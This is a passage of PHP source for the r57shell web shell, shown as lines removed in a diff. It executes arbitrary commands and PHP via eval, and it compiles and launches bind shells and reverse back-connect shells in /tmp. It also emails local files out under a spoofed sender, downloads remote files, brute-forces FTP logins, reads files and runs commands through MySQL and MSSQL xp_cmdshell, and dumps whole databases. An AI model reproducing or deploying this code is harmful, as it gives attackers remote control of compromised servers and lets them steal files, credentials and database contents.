-echo ws(2);

-echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));

-echo ws(2);

-echo "PHP version: <b>".@phpversion()."</b>";

-$curl_on = @function_exists('curl_version');

-echo ws(2);

-echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));

-echo ws(2);

-echo "MySQL: <b>";

-$mysql_on = @function_exists('mysql_connect');

-if($mysql_on){

-echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }

-echo ws(2);

-echo "MSSQL: <b>";

-$mssql_on = @function_exists('mssql_connect');

-if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}

-echo ws(2);

-echo "PostgreSQL: <b>";

-$pg_on = @function_exists('pg_connect');

-if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}

-echo ws(2);

-echo "Oracle: <b>";

-$ora_on = @function_exists('ocilogon');

-if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}

-echo "<br>".ws(2);

-echo "Disable functions : <b>";

-if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}

-$free = @diskfreespace($dir);

-if (!$free) {$free = 0;}

-$all = @disk_total_space($dir);

-if (!$all) {$all = 0;}

-$used = $all-$free;

-$used_percent = @round(100/($all/$free),2);

-echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";

-echo '</font></td></tr><table>

-<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>

-<tr><td align=right width=100>';

-echo $font;

-if(!$windows){

-echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';

-echo "</td><td>";

-echo "<font face=Verdana size=-2 color=red><b>";

-$uname = ex('uname -a');

-echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));

-if(!$safe_mode){

-$bsd1 = ex('sysctl -n kern.ostype');

-$bsd2 = ex('sysctl -n kern.osrelease');

-$lin1 = ex('sysctl -n kernel.ostype');

-$lin2 = ex('sysctl -n kernel.osrelease');

-}

-if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }

-else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }

-else { $sysctl = "-"; }

-echo ws(3).$sysctl."<br>";

-echo ws(3).ex('echo $OSTYPE')."<br>";

-echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";

-$id = ex('id');

-echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));

-echo ws(3).$dir;

-echo ws(3).'( '.perms(@fileperms($dir)).' )';

-echo "</b></font>";

-}

-else

-{

-echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';

-echo "</td><td>";

-echo "<font face=Verdana size=-2 color=red><b>";

-echo ws(3).@substr(@php_uname(),0,120)."<br>";

-echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";

-echo ws(3).@get_current_user()."<br>";

-echo ws(3).$dir;

-echo "<br></font>";

-}

-echo "</font>";

-echo "</td></tr></table>";

-if(empty($c1)||empty($c2)) { die(); }

-$f = '<br>';

-$f .= base64_decode($c1);

-$f .= base64_decode($c2);

-if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail")

- {

- $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$POST['from']."\r\n"); 

- mr($language,$res);

- $_POST['cmd']="";  

- }

-if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))

- {  

- if(!$file=@fopen($_POST['loc_file'],"r")) { echo re($_POST['loc_file']); $_POST['cmd']=""; }

- else 

-  {     

-    $filename = @basename($_POST['loc_file']);

-    $filedump = @fread($file,@filesize($_POST['loc_file']));

-    fclose($file);

-    $content_encoding=$mime_type='';

-    compress($filename,$filedump,$_POST['compress']);

-    $attach = array(

-                    "name"=>$filename,

-                    "type"=>$mime_type,

-                    "content"=>$filedump

-                   );

-    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; }

-    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }

-    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);

-    mr($language,$res);

-    $_POST['cmd']="";                           

-  }

- }

-if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")

-{

-$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';

-}

-if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")

- {

- switch($_POST['what'])

-   {

-   case 'own':

-   @chown($_POST['param1'],$_POST['param2']);

-   break;

-   case 'grp':

-   @chgrp($_POST['param1'],$_POST['param2']);

-   break;

-   case 'mod':

-   @chmod($_POST['param1'],intval($_POST['param2'], 8));

-   break;

-   }

- $_POST['cmd']="";

- }

-if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")

- {

-   switch($_POST['what'])

-   {

-     case 'file':

-      if($_POST['action'] == "create")

-       {

-       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }

-       else {

-        fclose($file);

-        $_POST['e_name'] = $_POST['mk_name'];

-        $_POST['cmd']="edit_file";

-        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";

-        }

-       }

-       else if($_POST['action'] == "delete")

-       {

-       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";

-       $_POST['cmd']="";

-       }

-     break;

-     case 'dir':

-      if($_POST['action'] == "create"){

-      if(mkdir($_POST['mk_name']))

-       {

-         $_POST['cmd']="";

-         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";

-       }

-      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }

-      }

-      else if($_POST['action'] == "delete"){

-      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";

-      $_POST['cmd']="";

-      }

-     break;

-   }

- }

-if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))

- {

- if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }

- if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }

- else {

- echo $table_up3;

- echo $font;

- echo "<form name=save_file method=post>";

- echo ws(3)."<b>".$_POST['e_name']."</b>";

- echo "<div align=center><textarea name=e_text cols=121 rows=24>";

- echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));

- fclose($file);

- echo "</textarea>";

- echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";

- echo "<input type=hidden name=dir value=".$dir.">";

- echo "<input type=hidden name=cmd value=save_file>";

- echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));

- echo "</div>";

- echo "</font>";

- echo "</form>";

- echo "</td></tr></table>";

- exit();

- }

- }

-if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")

- {

- if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }

- else {

- @fwrite($file,$_POST['e_text']);

- @fclose($file);

- $_POST['cmd']="";

- echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";

- }

- }

-if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))

-{

- cf("/tmp/bd.c",$port_bind_bd_c);

- $blah = ex("gcc -o /tmp/bd /tmp/bd.c");

- @unlink("/tmp/bd.c");

- $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");

- $_POST['cmd']="ps -aux | grep bd";

-}

-if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))

-{

- cf("/tmp/bdpl",$port_bind_bd_pl);

- $p2=which("perl");

- if(empty($p2)) $p2="perl";

- $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");

- $_POST['cmd']="ps -aux | grep bdpl";

-}

-if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))

-{

- cf("/tmp/back",$back_connect);

- $p2=which("perl");

- if(empty($p2)) $p2="perl";

- $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");

- $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";

-}

-if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))

-{

- cf("/tmp/back.c",$back_connect_c);

- $blah = ex("gcc -o /tmp/backc /tmp/back.c");

- @unlink("/tmp/back.c");

- $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");

- $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";

-}

-if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))

-{

- cf("/tmp/dp",$datapipe_pl);

- $p2=which("perl");

- if(empty($p2)) $p2="perl";

- $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");

- $_POST['cmd']="ps -aux | grep dp";

-}

-if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))

-{

- cf("/tmp/dpc.c",$datapipe_c);

- $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");

- @unlink("/tmp/dpc.c");

- $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");

- $_POST['cmd']="ps -aux | grep dpc";

-}

-if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}}

-if (!empty($HTTP_POST_FILES['userfile']['name']))

-{

-if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }

-else { $nfn = $HTTP_POST_FILES['userfile']['name']; }

-@copy($HTTP_POST_FILES['userfile']['tmp_name'],

-            $_POST['dir']."/".$nfn)

-      or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");

-}

-if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))

-{

- switch($_POST['with'])

- {

- case wget:

- $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";

- break;

- case fetch:

- $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";

- break;

- case lynx:

- $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";

- break;

- case links:

- $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";

- break;

- case GET:

- $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";

- break;

- case curl:

- $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";

- break;

- }

-}

-if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))

- {

- list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);

- if(empty($ftp_port)) { $ftp_port = 21; }

- $connection = @ftp_connect ($ftp_server,$ftp_port,10); 

- if(!$connection) { fe($language,0); }

- else 

-  {     

-  if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); }

-  else 

-   {    

-   if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);      }

-   if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);     }

-   }

-  }

- @ftp_close($connection);

- $_POST['cmd'] = "";

- }

-if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")

- {

- list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);

- if(empty($ftp_port)) { $ftp_port = 21; }

- $connection = @ftp_connect ($ftp_server,$ftp_port,10); 

- if(!$connection) { fe($language,0); $_POST['cmd'] = ""; }      

- else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }

- @ftp_close($connection);

- }

-echo $table_up3;

-if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); }

-else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }

-echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";

-if($safe_mode)

-{

- switch($_POST['cmd'])

- {

- case 'safe_dir':

-  $d=@dir($dir);

-  if ($d)

-   {

-   while (false!==($file=$d->read()))

-    {

-     if ($file=="." || $file=="..") continue;

-     @clearstatcache();

-     list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);

-     if($windows){ 

-     echo date("d.m.Y H:i",$mtime);

-     if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);

-     }

-     else{ 

-     $owner = @posix_getpwuid($uid);

-     $grgid = @posix_getgrgid($gid);

-     echo $inode." ";

-     echo perms(@fileperms($file));

-     printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);

-     echo date("d.m.Y H:i ",$mtime);

-     }

-     echo "$file\n";

-    }

-   $d->close();

-   }

-  else echo $lang[$language._text29];

- break;

- case 'safe_file':

-  if(@is_file($_POST['file']))

-   {

-   $file = @file($_POST['file']);

-   if($file)

-    {

-    $c = @sizeof($file);

-    for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }

-    }

-   else echo $lang[$language._text29];

-   }

-  else echo $lang[$language._text31];

-  break;

-  case 'test1':

-  $ci = @curl_init("file://".$_POST['test1_file']."");

-  $cf = @curl_exec($ci);

-  echo $cf;

-  break;

-  case 'test2':

-  @include($_POST['test2_file']);

-  break;

-  case 'test3':

-  if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }

-  $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);

-  if($db)

-   {

-   if(@mysql_select_db($_POST['test3_md'],$db))

-    {

-     $sql = "DROP TABLE IF EXISTS temp_r57_table;";

-     @mysql_query($sql);

-     $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );";

-     @mysql_query($sql);

-     $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;";

-     @mysql_query($sql);

-     $sql = "SELECT * FROM temp_r57_table;";

-     $r = @mysql_query($sql);

-     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }

-     $sql = "DROP TABLE IF EXISTS temp_r57_table;";

-     @mysql_query($sql);

-    }

-    else echo "[-] ERROR! Can't select database";

-   @mysql_close($db);

-   }

-  else echo "[-] ERROR! Can't connect to mysql server";

-  break;

-  case 'test4':

-  if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }

-  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);

-  if($db)

-   {

-   if(@mssql_select_db($_POST['test4_md'],$db))

-    {

-     @mssql_query("drop table r57_temp_table",$db);

-     @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);

-     @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);

-     $res = mssql_query("select * from r57_temp_table",$db);

-     while(($row=@mssql_fetch_row($res)))

-      {

-      echo $row[0]."\r\n";

-      } 

-    @mssql_query("drop table r57_temp_table",$db);

-    }

-    else echo "[-] ERROR! Can't select database";

-   @mssql_close($db);

-   }

-  else echo "[-] ERROR! Can't connect to MSSQL server";

-  break;

- }

-}

-else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){

- $cmd_rep = ex($_POST['cmd']);

- if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }

- else { echo @htmlspecialchars($cmd_rep)."\n"; }}

-if ($_POST['cmd']=="ftp_brute")

- {

- $suc = 0;

- foreach($users as $user)

-  {     

-  $connection = @ftp_connect($ftp_server,$ftp_port,10); 

-  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }

-  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } } 

-  @ftp_close($connection);

-  }

- echo "\r\n-------------------------------------\r\n";

- $count = count($users);

- if(isset($_POST['reverse'])) { $count *= 2; }

- echo $lang[$language.'_text97'].$count."\r\n";

- echo $lang[$language.'_text98'].$suc."\r\n";

- }

-if ($_POST['cmd']=="php_eval"){

- $eval = @str_replace("<?","",$_POST['php_eval']);

- $eval = @str_replace("?>","",$eval);

- @eval($eval);}

-if ($_POST['cmd']=="db_show")

- {

- switch($_POST['db'])

- {

- case 'MySQL':

- if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }

- $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);

- if($db)

-   {

-   $res=@mysql_query("SHOW DATABASES", $db);

-   while(($row=@mysql_fetch_row($res)))

-    {

-     echo "[+] ".$row[0]."\r\n";

-     if(isset($_POST['st'])){

-     $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db);

-     while(($row2=@mysql_fetch_row($res2))) 

-      {

-      echo " | - ".$row2[0]."\r\n";

-      if(isset($_POST['sc']))

-       {

-       $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db);

-       while(($row3=@mysql_fetch_row($res3))) { echo "   | - ".$row3[0]."\r\n"; }

-       }

-      } 

-     }

-    }

-   @mysql_close($db);

-   }

- else echo "[-] ERROR! Can't connect to MySQL server";          

- break;

- case 'MSSQL':

- if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }

- $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);

- if($db)

-   {

-   $res=@mssql_query("sp_databases", $db);

-   while(($row=@mssql_fetch_row($res)))

-    {

-     echo "[+] ".$row[0]."\r\n";

-     if(isset($_POST['st'])){

-     @mssql_select_db($row[0]);

-     $res2 = @mssql_query("sp_tables",$db);

-     while(($row2=@mssql_fetch_array($res2))) 

-      {

-      if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties')

-      {

-      echo " | - ".$row2['TABLE_NAME']."\r\n"; 

-      if(isset($_POST['sc']))

-       {

-       $res3 = @mssql_query("sp_columns ".$row2[2],$db);

-       while(($row3=@mssql_fetch_array($res3))) { echo "   | - ".$row3['COLUMN_NAME']."\r\n"; }

-       }

-      }

-      } 

-     }

-    }

-   @mssql_close($db);

-   }

- else echo "[-] ERROR! Can't connect to MSSQL server";

- break;

- case 'PostgreSQL':

- if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }

-  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";

-  $db = @pg_connect($str);

-  if($db)

-  {

-  $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'");

-   while(($row=@pg_fetch_row($res)))

-    {

-     echo "[+] ".$row[0]."\r\n";

-    }   

-  @pg_close($db);

-  }

- else echo "[-] ERROR! Can't connect to PostgreSQL server";     

- break;

- }

- }

-if ($_POST['cmd']=="mysql_dump")

- {

-  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }

-  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){

-  $sqh  = "# homepage: http://rst.void.ru\r\n";

-  $sqh .= "# ---------------------------------\r\n";

-  $sqh .= "#     date : ".date ("j F Y g:i")."\r\n";

-  $sqh .= "# database : ".$_POST['mysql_db']."\r\n";

-  $sqh .= "#    table : ".$_POST['mysql_tbl']."\r\n";

-  $sqh .= "# ---------------------------------\r\n\r\n";

-  switch($_POST['db']){

-  case 'MySQL':

-  if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; }

-  $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);

-  if($db)

-   {

-   if(@mysql_select_db($_POST['mysql_db'],$db))

-    {

-     $sql1  = "# MySQL dump created by r57shell\r\n";

-     $sql1 .= $sqh;

-     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);

-     $row   = @mysql_fetch_row($res);

-     $sql1 .= $row[1]."\r\n\r\n";

-     $sql1 .= "# ---------------------------------\r\n\r\n";

-     $sql2 = '';

-     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);

-     if (@mysql_num_rows($res) > 0) {

-     while (($row = @mysql_fetch_assoc($res))) {

-     $keys = @implode("`, `", @array_keys($row));

-     $values = @array_values($row);

-     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}

-     $values = @implode("', '", $values);

-     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";

-     }

-     $sql2 .= "\r\n# ---------------------------------";

-     }

-    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }

-    else { echo $sql1.$sql2; }

-    }

-    else echo "[-] ERROR! Can't select database";

-   @mysql_close($db);

-   }

-  else echo "[-] ERROR! Can't connect to MySQL server";

-  break;

-  case 'MSSQL':

-  if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; }

-  $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']);

-  if($db)

-  {

-   if(@mssql_select_db($_POST['mysql_db'],$db))

-    {

-     $sql1  = "# MSSQL dump created by r57shell\r\n";

-     $sql1 .= $sqh;

-     $sql2 = '';

-     $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db);

-     if (@mssql_num_rows($res) > 0) {

-     while (($row = @mssql_fetch_assoc($res))) {

-     $keys = @implode(", ", @array_keys($row));

-     $values = @array_values($row);

-     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}

-     $values = @implode("', '", $values);

-     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";

-     }

-     $sql2 .= "\r\n# ---------------------------------";

-     }

-     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }

-     else { echo $sql1.$sql2; }

-    }

-   else echo "[-] ERROR! Can't select database";

-   @mssql_close($db);   

-  }     

-  else echo "[-] ERROR! Can't connect to MSSQL server";

-  break;

-  case 'PostgreSQL':

-  if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; }

-  $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'";

-  $db = @pg_connect($str);

-  if($db)

-  {

-     $sql1  = "# PostgreSQL dump created by r57shell\r\n";

-     $sql1 .= $sqh;

-     $sql2 = '';

-     $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl']."");

-     if (@pg_num_rows($res) > 0) {

-     while (($row = @pg_fetch_assoc($res))) {

-     $keys = @implode(", ", @array_keys($row));

-     $values = @array_values($row);

-     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}

-     $values = @implode("', '", $values);

-     $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n";

-     }

-     $sql2 .= "\r\n# ---------------------------------";

-     }

-     if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }

-     else { echo $sql1.$sql2; }

-   @pg_close($db);      

-  }     

-  else echo "[-] ERROR! Can't connect to PostgreSQL server";

-  break;

-  } 

- } 

- else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; }

- } 

-echo "</textarea></div>";

-echo "</b>";

-echo "</td></tr></table>";

-echo "<table width=100% cellpadding=0 cellspacing=0>";

-function up_down($id)

- {

- global $lang;

- global $language;

- return '&nbsp<img src='.$_SERVER['PHP_SELF'].'?img=1 onClick="document.getElementById(\''.$id.'\').style.display = \'none\'; document.cookie=\''.$id.'=0;\';" title="'.$lang[$language.'_text109'].'"><img src='.$_SERVER['PHP_SELF'].'?img=2 onClick="document.getElementById(\''.$id.'\').style.display = \'block\'; document.cookie=\''.$id.'=1;\';" title="'.$lang[$language.'_text110'].'">';     

- }

-function div($id)

- { 

- if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';       

- return '<div id="'.$id.'">';

- }

-if(!$safe_mode){

-echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts;

-echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));

-echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));

-echo $te.'</div>'.$table_end1.$fe;

-}

-else{

-echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts;

-echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));

-echo $te.'</div>'.$table_end1.$fe;

-}

-echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts;

-echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));

-echo $te.'</div>'.$table_end1.$fe;

-if($safe_mode){

-echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;

-echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));

-echo $te.'</div>'.$table_end1.$fe;

-}

-if($safe_mode && $unix){

-echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;

-echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));

-echo $te.'</div>'.$table_end1.$fe;

-}

-if(!$safe_mode){

-foreach ($aliases as $alias_name=>$alias_cmd)

- {

- $aliases2 .= "<option>$alias_name</option>";

- }

-echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;

